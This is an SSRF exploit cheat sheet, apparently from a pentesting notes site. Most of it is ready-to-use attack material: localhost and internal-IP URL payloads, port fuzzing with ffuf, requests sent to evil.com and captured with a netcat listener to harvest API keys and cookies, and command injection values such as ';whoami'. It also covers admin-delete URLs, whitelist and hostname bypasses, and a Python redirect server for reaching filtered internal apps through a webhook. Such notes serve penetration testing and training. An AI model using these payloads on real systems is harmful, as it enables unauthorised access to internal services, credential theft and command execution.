Exploit Notes

SSRF (Server-Side Request Forgery)

Last modified: 2023-03-26

Web

SSRF is a type of exploit where an attacker abuses the functionality of a server causing it to access or manipulate information in the realm of that server that would otherwise not be directly accessibleto the attacker. SSRF is an attack against a server.

Capture Tools

If you want to capture the SSRF affections, there are some online tools available for capturing SSRF.

Or we can simply open local web server.

python3 -m http.server 8000

Basic

We may be able to use another server in the target machine.
For example, pass the localhost URL to the GET parameters.
Also These are available in POST params.

# Localhost
?url=http://localhost/
?url=http://127.0.0.1/
?url=http://127.0.0.1:80/
?url=http://127.0.0.1:3000/
?url=http://127.0.0.1:8000/
?url=http://127.0.0.1:8080/
?url=http://2130706433/
?url=http://017700000001/
?url=http://127.1/

# Backend URL (e.g. 192.168.0.x)
?url=http://192.168.0.23/
?url=http://192.168.0.23:80/
?url=http://192.168.0.23:3000/
?url=http://192.168.0.23:8000/
?url=http://192.168.0.23:8080/

# At sign
?url=test@sub.example.com/index.php

Local Port Enumeration

We can find which port is opening by fuzzing port number.

seq 1 65535 | ffuf -u https://example.com/?url=http://127.0.0.1:FUZZ -w -

Listen HTTP Request

If the website is vulnerable to SSRF, we can fetch sensitive information in HTTP request by sniffing.
First off, start a listener in local machine.

sudo nc -lvp 80

Then send request that is affected by SSRF.

https://example.com/mail?server=http://evil.com

See the HTTP request in local machine.
We might be able to fetch the sensitive data such as API key, Cookie, etc.


OS Command Injection

?url=http://127.0.0.1:3000/test;whoami
?url=http://127.0.0.1:3000/test;ping+-c+1+10.0.0.1

Admin Operations

We may be able to operate significant stuff as the admin user via local server.

# Localhost
?url=http://localhost/admin
?url=http://localhost/admin/delete?username=john
?url=http://127.1/%25%36%31dmin

# Backend URL (e.g. 192.168.0.x)
?url=http://192.168.0.23/admin
?url=http://192.168.0.23/admin/delete?username=john

Whitelisted URL Bypass

If the target website allows only the whitelisted URL, we can use them.
Assume only "example.com" is allowed by the target website.

?url=http://localhost@example.com/
?url=http://localhost%25%32%33@example.com/

Open Redirect

key=/post/next?path=http://localhost/admin

Hostname Bypass

1. Add Target Domain to /etc/hosts in Local Machine

x.x.x.x sub.example.com

Restart the hostname service to apply the configuration imediately.

sudo systemctl restart systemd-hostnamed

2. Access to the Domain We Specified**

https://example.com/?proxy=https://sub.example.com

API Request

We might be able to get information from an API endpoint that is not accessible normally.

?url=https://api.example.com/users
?url=https://api.example.com@internal-api.example.com/users

Reveal Filtered Websites via Monitoring Tools (Webhook)

Some web apps may have monitoring tools that check the health of external websites.
You may be able to reveal hidden contents of the target via the monitor.
First off, create a redirect server using Python. Here it’s named “redirect.py”.

#!/usr/bin/python3
import sys
from http.server import HTTPServer, BaseHTTPRequestHandler

class Redirect(BaseHTTPRequestHandler):
  def do_GET(self):
      self.send_response(302)
      self.send_header('Location', sys.argv[1])
      self.end_headers()

HTTPServer(("0.0.0.0", 8000), Redirect).serve_forever()

After creating, run the following command.
Assume that the filtered port is 3000 (nmap will reveal it).

python3 redirect.py http://127.0.0.1:3000

And start listener for receiving the POST request of the webhook from the target website.

nc -lvnp 4444

Now set the configuration of the webhook. For example:

Payload URL: http://<local-ip>:4444/
Monitored URL: http://<local-ip>:8000/

You can see the contents of the filtered app.

Tools by HDKS

Fuzzagotchi

Automatic web fuzzer.

aut0rec0n

Auto reconnaissance CLI.

Hash Cracker

Hash identifier.